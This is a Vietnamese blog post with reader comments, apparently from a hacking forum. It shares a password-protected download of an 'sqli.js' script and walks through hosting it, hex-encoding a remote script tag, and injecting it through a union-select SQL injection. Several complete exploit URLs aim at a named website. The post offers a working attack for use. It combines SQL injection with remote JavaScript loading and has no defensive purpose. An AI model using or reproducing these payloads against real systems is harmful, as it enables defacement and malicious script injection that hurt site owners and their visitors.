Download Code:
pass: VNHhttp://www.mediafire.com/?457p1u9c9uv7cw7
<script src='http://link.com/sqli.js'></script>
-úp file js lên hosting.
-sử link js trong sript sau:
VD:
<script src='http://thptquangha.com/sqli.js'></script>
-sau đó convert đoạn sript trên sang hex.
- ta được :
3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c692e6a73273e3c2f7363726970743e
- dùng nó trong thẻ sau:
concat((0x mã hex))volcano
VD:
concat((0x3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c692e6a73273e3c2f7363726970743e))volcano
- đã xong. giờ ví dụ bạn đang khai thác 1 site bị sqli.
đã tìm được số lỗi. bạn chỉ việc chèn đoạn trên vào 1 trong các số lỗi đó. tiếp theo bạn tự tìm hiểu .
( cái này không hẳn site nào cũng khai thác được ).
-VD với js trên :
http://kemlam.com/?content=detail&proID=-10+union+select+1,2,3,concat((0x3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c692e6a73273e3c2f7363726970743e))volcano,5,6,7,8,9,10,11,12,13
=======================================
II- Hoặc 1 js khác : cái này dễ nhìn hơn cái trên ;))
download: http://www.mediafire.com/?o9gvag0gl4ggc8d
http://kemlam.com/?content=detail&proID=-10+union+select+1,2,3,concat((0x3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c69322e6a73273e3c2f7363726970743e))volcano,5,6,7,8,9,10,11,12,13
pass gia nen
Trả lờiXóapass: VNH
Trả lờiXóapass sai rồi bạn :(
Trả lờiXóahttp://www.mediafire.com/?457p1u9c9uv7cw7
Trả lờiXóafix link
Cho xin hướng dẫn sử dụng đi bạn :D
Trả lờiXóaĐã sửa bài viết cho chi tiết hơn ! c tham khảo !
Trả lờiXóacảm ơn đã ghé thăm .
Thanks bạn đã chia sẻ :)
Trả lờiXóa